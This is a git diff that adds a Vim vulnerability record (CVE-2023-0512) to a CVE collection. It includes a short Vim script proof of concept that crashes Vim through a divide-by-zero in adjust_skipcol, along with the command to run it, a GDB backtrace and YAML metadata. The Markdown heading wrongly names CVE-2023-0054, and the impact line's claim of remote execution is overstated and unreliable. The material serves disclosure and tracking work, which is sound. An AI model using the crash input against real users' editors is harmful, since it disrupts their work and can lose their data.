diff --git a/cve/vim/2023/CVE-2023-0512/poc_dbz01_s.dat b/cve/vim/2023/CVE-2023-0512/poc_dbz01_s.dat new file mode 100644 index 0000000000000000000000000000000000000000..786b9d253b0607a57c7881a6cc6c16fbb89c5a05 --- /dev/null +++ b/cve/vim/2023/CVE-2023-0512/poc_dbz01_s.dat @@ -0,0 +1,5 @@ +wi0 0 +no0 H +sil0norm0 +sil0norm00000:se!no +sil0norm0 \ No newline at end of file diff --git "a/cve/vim/2023/CVE-2023-0512/\346\274\217\346\264\236CVE-2023-0512.md" "b/cve/vim/2023/CVE-2023-0512/\346\274\217\346\264\236CVE-2023-0512.md" new file mode 100644 index 0000000000000000000000000000000000000000..efca437fed854baad8099a88d9efb79bf7879939 --- /dev/null +++ "b/cve/vim/2023/CVE-2023-0512/\346\274\217\346\264\236CVE-2023-0512.md" @@ -0,0 +1,108 @@ +# 漏洞CVE-2023-0054 +## Description +Divide By Zero in function adjust_skipcol at move.c:1978 + +## Vim Version +```shell +git log +commit 7193323b7796c05573f3aa89d422e848feb3a8dc (HEAD -> master, tag: v9.0.1223, origin/master, origin/HEAD) +``` + +## Proof of Concept +```shell +./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc_dbz01_s.dat -c :qa! +Floating point exception./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc_dbz01_s.dat -c :qa! +Floating point exception +``` + +# GDB + +``` +gdb --args ./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc_dbz01_s.dat -c :qa! +─── Output/messages ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── +[Thread debugging using libthread_db enabled] +Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". + +Program received signal SIGFPE, Arithmetic exception. +0x0000555555f020d7 in adjust_skipcol () at move.c:1978 +1978 row += col / width2; +─── Assembly ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── + 0x0000555555f020c4 adjust_skipcol+4025 mov $0x45c1,%edx + 0x0000555555f020c9 adjust_skipcol+4030 mov 0xd54f20(%rip),%rax # 0x555556c56ff0 + 0x0000555555f020d0 adjust_skipcol+4037 mov %edx,%fs:(%rax) + 0x0000555555f020d3 adjust_skipcol+4040 mov -0x2c(%rbp),%eax + 0x0000555555f020d6 adjust_skipcol+4043 cltd + 0x0000555555f020d7 adjust_skipcol+4044 idivl -0x20(%rbp) + 0x0000555555f020da adjust_skipcol+4047 add %eax,-0x28(%rbp) + 0x0000555555f020dd adjust_skipcol+4050 mov -0x2c(%rbp),%eax + 0x0000555555f020e0 adjust_skipcol+4053 cltd + 0x0000555555f020e1 adjust_skipcol+4054 idivl -0x20(%rbp) +─── Breakpoints ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── +─── Expressions ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── +─── History ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── +─── Memory ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── +─── Registers ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────���─────────────────────────── + rax 0x0000000000000008 rbx 0x0000555556d8e320 rcx 0x0000555556d968f8 rdx 0x0000000000000000 rsi 0x0000000000000000 rdi 0x0000000000000000 + rbp 0x00007fffffff8e80 rsp 0x00007fffffff8e50 r8 0x0000000000000007 r9 0x000062100002e0ff r10 0x00007ffff65a1000 r11 0x00000000000000f8 + r12 0x00000000fffffff8 r13 0x00000ffffffff1fa r14 0x00007fffffff8fd0 r15 0x00007fffffffb750 rip 0x0000555555f020d7 eflags [ IF RF ] + cs 0x00000033 ss 0x0000002b ds 0x00000000 es 0x00000000 fs 0x00000000 gs 0x00000000 +─── Source ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── + 1973 col -= width1; + 1974 ++row; + 1975 } + 1976 if (col > width2) + 1977 { + 1978 row += col / width2; + 1979 col = col % width2; + 1980 } + 1981 if (row >= curwin->w_height) + 1982 { +─── Stack ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── +[0] from 0x0000555555f020d7 in adjust_skipcol+4044 at move.c:1978 +[1] from 0x00005555558e44b0 in beginline+1831 at edit.c:2642 +[2] from 0x0000555555a741c4 in do_ecmd+35847 at ex_cmds.c:3167 +[3] from 0x0000555555b0626f in do_exedit+4927 at ex_docmd.c:7187 +[4] from 0x0000555555b01393 in ex_splitview+5888 at ex_docmd.c:6834 +[5] from 0x0000555555abd910 in do_one_cmd+59345 at ex_docmd.c:2580 +[6] from 0x0000555555aa5e4a in do_cmdline+16990 at ex_docmd.c:993 +[7] from 0x0000555555aa1bbd in do_cmdline_cmd+43 at ex_docmd.c:587 +[8] from 0x00005555568f8e11 in do_window+5838 at window.c:274 +[9] from 0x0000555555f71e34 in nv_window+730 at normal.c:5614 +[+] +─── Threads ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── +[1] id 2116628 name vim from 0x0000555555f020d7 in adjust_skipcol+4044 at move.c:1978 +─── Variables ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── +loc width1 = -8, width2 = 0, so = 0, scrolloff_cols = 0, scrolled = 0, col = 8, row = 1 +─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── +>>> bt +#0 0x0000555555f020d7 in adjust_skipcol () at move.c:1978 +#1 0x00005555558e44b0 in beginline (flags=6) at edit.c:2642 +#2 0x0000555555a741c4 in do_ecmd (fnum=0, ffname=0x0, sfname=0x0, eap=0x7fffffffb410, newlnum=1, flags=1, oldwin=0x0) at ex_cmds.c:3167 +#3 0x0000555555b0626f in do_exedit (eap=0x7fffffffb410, old_curwin=0x625000023100) at ex_docmd.c:7187 +#4 0x0000555555b01393 in ex_splitview (eap=0x7fffffffb410) at ex_docmd.c:6834 +#5 0x0000555555abd910 in do_one_cmd (cmdlinep=0x7fffffffb780, flags=11, cstack=0x7fffffffb8a0, fgetline=0x0, cookie=0x0) at ex_docmd.c:2580 +#6 0x0000555555aa5e4a in do_cmdline (cmdline=0x7fffffffc090 "new", fgetline=0x0, cookie=0x0, flags=11) at ex_docmd.c:993 +#7 0x0000555555aa1bbd in do_cmdline_cmd (cmd=0x7fffffffc090 "new") at ex_docmd.c:587 +#8 0x00005555568f8e11 in do_window (nchar=14, Prenum=0, xchar=0) at window.c:274 +#9 0x0000555555f71e34 in nv_window (cap=0x7fffffffc210) at normal.c:5614 +#10 0x0000555555f28ab7 in normal_cmd (oap=0x7fffffffc330, toplevel=1) at normal.c:938 +#11 0x0000555555b1b123 in exec_normal (was_typed=0, use_vpeekc=0, may_use_terminal_loop=0) at ex_docmd.c:8887 +#12 0x0000555555b1aab8 in exec_normal_cmd (cmd=0x611000000b88 "0", remap=0, silent=0) at ex_docmd.c:8850 +#13 0x0000555555b19a00 in ex_normal (eap=0x7fffffffc710) at ex_docmd.c:8768 +#14 0x0000555555abd910 in do_one_cmd (cmdlinep=0x7fffffffca80, flags=7, cstack=0x7fffffffcba0, fgetline=0x555556341b6c , cookie=0x7fffffffd470) at ex_docmd.c:2580 +#15 0x0000555555aa5e4a in do_cmdline (cmdline=0x611000000540 "wi0 0", fgetline=0x555556341b6c , cookie=0x7fffffffd470, flags=7) at ex_docmd.c:993 +#16 0x000055555633a828 in do_source_ext (fname=0x603000000e23 "./poc_dbz01_s.dat", check_other=0, is_vimrc=0, ret_sid=0x0, eap=0x0, clearvars=0) at scriptfile.c:1672 +#17 0x000055555633d027 in do_source (fname=0x603000000e23 "./poc_dbz01_s.dat", check_other=0, is_vimrc=0, ret_sid=0x0) at scriptfile.c:1818 +#18 0x000055555633571a in cmd_source (fname=0x603000000e23 "./poc_dbz01_s.dat", eap=0x7fffffffd6d0) at scriptfile.c:1163 +#19 0x0000555556335873 in ex_source (eap=0x7fffffffd6d0) at scriptfile.c:1189 +#20 0x0000555555abd910 in do_one_cmd (cmdlinep=0x7fffffffda40, flags=11, cstack=0x7fffffffdb60, fgetline=0x0, cookie=0x0) at ex_docmd.c:2580 +#21 0x0000555555aa5e4a in do_cmdline (cmdline=0x603000000af0 "so ./poc_dbz01_s.dat", fgetline=0x0, cookie=0x0, flags=11) at ex_docmd.c:993 +#22 0x0000555555aa1bbd in do_cmdline_cmd (cmd=0x603000000af0 "so ./poc_dbz01_s.dat") at ex_docmd.c:587 +#23 0x0000555556adbcd1 in exe_commands (parmp=0x555556d8d460 ) at main.c:3146 +#24 0x0000555556ac5d79 in vim_main2 () at main.c:782 +#25 0x0000555556ac3251 in main (argc=15, argv=0x7fffffffe438) at main.c:433 +``` + +## Impact + +This vulnerability is capable of crashing software, modify memory, and possible remote execution. \ No newline at end of file diff --git a/cve/vim/2023/yaml/CVE-2023-0512.yaml b/cve/vim/2023/yaml/CVE-2023-0512.yaml new file mode 100644 index 0000000000000000000000000000000000000000..d0060dc5cab2f3325241ac2aa042b697a1238b01 --- /dev/null +++ b/cve/vim/2023/yaml/CVE-2023-0512.yaml @@ -0,0 +1,19 @@ +id: CVE-2023-0512 +source: https://huntr.dev/bounties/de83736a-1936-4872-830b-f1e9b0ad2a74/ +info: + name: Vim是一款基于UNIX平台的编辑器。 + severity: high + description: | + vim软件包的src/move.c文件中adjust_skipcol()函数存在除以0的浮点异常问题,该漏洞可导致程序崩溃、数据出错等。 + scope-of-influence: + vim < 9.0.1247 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2023-0512 + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-score: 7.8 + cve-id: CVE-2023-0512 + cwe-id: CWE-369 + cnvd-id: None + kve-id: None + tags: cve2023, 除零错误 \ No newline at end of file diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 0d949e3432bd81fb3bc777aeab9ec46b183f9fb8..61038baf2d891612dd5fbaae31f42aeb7c5504e3 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -87,6 +87,7 @@ cve: - CVE-2022-2598 - CVE-2023-0433 - CVE-2023-0054 + - CVE-2023-0512 openssl: - CVE-2022-1292 - CVE-2022-2274